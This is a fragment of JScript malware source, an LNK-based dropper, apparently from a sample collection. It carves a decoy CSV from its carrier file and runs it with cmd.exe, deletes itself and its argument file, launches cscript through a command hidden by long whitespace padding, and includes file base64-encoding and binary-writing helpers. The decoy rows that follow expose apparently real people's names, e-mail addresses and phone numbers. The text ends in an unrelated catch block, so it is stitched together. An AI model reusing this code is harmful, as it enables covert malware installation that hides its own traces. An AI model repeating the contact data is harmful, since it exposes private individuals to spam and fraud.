	} //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_file(src, dest, start, file_size) { //p0b2x6
	var oFile = fso.GetFile(src); //p0b2x6
	var oRead = oFile.OpenAsTextStream(); //p0b2x6
	data = oRead.Read(oFile.Size); //p0b2x6
	oRead.Close(); //p0b2x6
	offset_data = data.substr(start+1, file_size); //p0b2x6
	var wFile = fso.OpenTextFile(dest, 2, true); //p0b2x6
	wFile.Write(offset_data); //p0b2x6
	wFile.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function delete_temp_files() { //p0b2x6
	fso.DeleteFile(WScript.arguments(0), 1); //p0b2x6
	fso.DeleteFile(WScript.ScriptFullName, 1); //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_and_run_decoy() { //p0b2x6
	extract_file(WScript.arguments(0), extracted_file, lnk_filesize, extracted_file_filesize); //p0b2x6
	WshShell.Run("cmd.exe /c "+extracted_file, false, false); //p0b2x6
} //p0b2x6
 //p0b2x6
function exec_cscript(path) { //p0b2x6
	WshShell.Run("cscript.exe                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     "+path, false, false); //p0b2x6
} //p0b2x6
 //p0b2x6
function base64_encode(path) { //p0b2x6
	var inputStream = new ActiveXObject('ADODB.Stream'); //p0b2x6
	inputStream.Open(); //p0b2x6
	inputStream.Type = 1; //p0b2x6
	inputStream.LoadFromFile(path); //p0b2x6
	var bytes = inputStream.Read(); //p0b2x6
	var dom = new ActiveXObject('Microsoft.XMLDOM'); //p0b2x6
	var elem = dom.createElement('tmp'); //p0b2x6
	elem.dataType = 'bin.base64'; //p0b2x6
	elem.nodeTypedValue = bytes; //p0b2x6
	return elem.text.replace(/[^A-Z\d+=\/]/gi, ''); //p0b2x6
} //p0b2x6
 //p0b2x6
function bin_write(path, bin_data) { //p0b2x6
	var BinaryStream = WScript.CreateObject("ADODB.Stream"); //p0b2x6
	BinaryStream.Type = 2; //p0b2x6
	BinaryStream.Charset = "ISO-8859-1"; //p0b2x6
	BinaryStream.Open(); //p0b2x6
	BinaryStream.WriteText(bin_data); //p0b2x6
	BinaryStream.SaveToFile(path, 2); //p0b2x6
	BinaryStream.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function hex2bin(hex) { //p0b2x6
	var bytes = [], str; //p0b2x6
 //p0b2x6
	for(var i=0; i< hex.length-1; i+=2) //p0b2x6
		bytes.push(parseInt(hex.substr(i, 2), 16)); //p0b2x6
 //p0b2x6
	return String.fromCharCode.apply(String, bytes);	 //p0b2x6
} //p0b2x6
 //p0b2x6
[Decoy data: the remainder of the object is the 200_Germany.csv decoy, 169 comma-separated rows of personal contact records (first name, last name, e-mail address, country "Germany", phone number). The rows are omitted from this page. The script carves this CSV out of the carrier file at offset lnk_filesize+1 and opens it with cmd.exe /c as the lure the victim sees while the agent installs.]
christian,eichhorn,eichel240@gmail.com,Germany,(49171) 622-5785
manfred,back,meinback@ish.de,Germany,(491764) 336-7909
Ekkehard,Westphal,ekkehardwestphal@gmx.de,Germany,(49422) 294-7553
mayelin,Acosta,a_mayelin23@yahoo.com,Germany,(491512) 255-8380
Wil,Thoms,w.thoms@web.de,Germany,(491051) 140-2342
Uwe Sinn,Sinn,u.sinn@gmx.de,Germany,(4971) 342-2807
David,Wei,weissdvd@gmail.com,Germany,(491523) 693-3722
Christian,Hartmann,chrisnew2022@gmail.com,Germany,(49174) 763-4541
Benjamin ,Sorg,sorg.benny@gmail.com,Germany,(49175) 783-1988
Otto,Engel,ottoengel1987@gmail.com,Germany,(49160) 283-7724
Justin ,Neuhaus ,Jneuhaus92@gmail.com,Germany,(49177) 186-8247
alexander,tews,vip.tews@list.ru,Germany,(491762) 151-3131
Ludwig,Scholl,schoell-osi@t-online.de,Germany,(49917) 996-3802
Evita,Leonhardt,evita.leonhardt@icloud.com,Germany,(49) 847-3950
werner,friedrich,friedschnurzel@freenet.de,Germany,(49332) 075-0878
Andreas,Rippin,andreasrippin@hotmail.com,Germany,(491575) 409-8266
thomas,Hanf,hanfthomas42@gmail.com,Germany,(491525) 698-6179
Herro,Herin,Herro@mail.de,Germany,(4930) 241-5889
michael,Belz,belzmichi@gmail.com,Germany,(49170) 303-1627
Peggy,Mundt,peggymundt74.p.m@gmail.com,Germany,(49162) 872-7235
Jens ,Schwieger ,jens-schwieger@web.de,Germany,(49174) 174-9935
Lets ,Sell ,letssell123@gmx.de,Germany,(491522) 939-8382
Stefan,Fust,info@elektro-fust.fe,Germany,(49171) 720-8113
Werner,Herold,werner.herold@vkkl.de,Germany,(49171) 622-5785
Kevin,Engler,kevin-engler@gmx.de,Germany,(49162) 746-3275
Otto,Heise,otto_heise@web.de,Germany,(491523) 369-0995
qadeer,javed,nehanqadeer2@gmail.com,Germany,(491521) 712-8881
Zueleha,Lekesiz,lekesiz672@gmail.com,Germany,(49173) 734-6040
Johann,Gruber,johanngruber@mail.de,Germany,(491522) 276-2116
Ahmed,Krouma,afr2003k@freenet.de,Germany,(49219) 146-2516
Julitta,karnagel,julittakarnagel@aol.com,Germany,(4915200) 684-2554
Kevin,Kubler,masterKevin1991@web.de,Germany,(491522) 357-6491

} catch (e) {
  app.alert(e.message);
}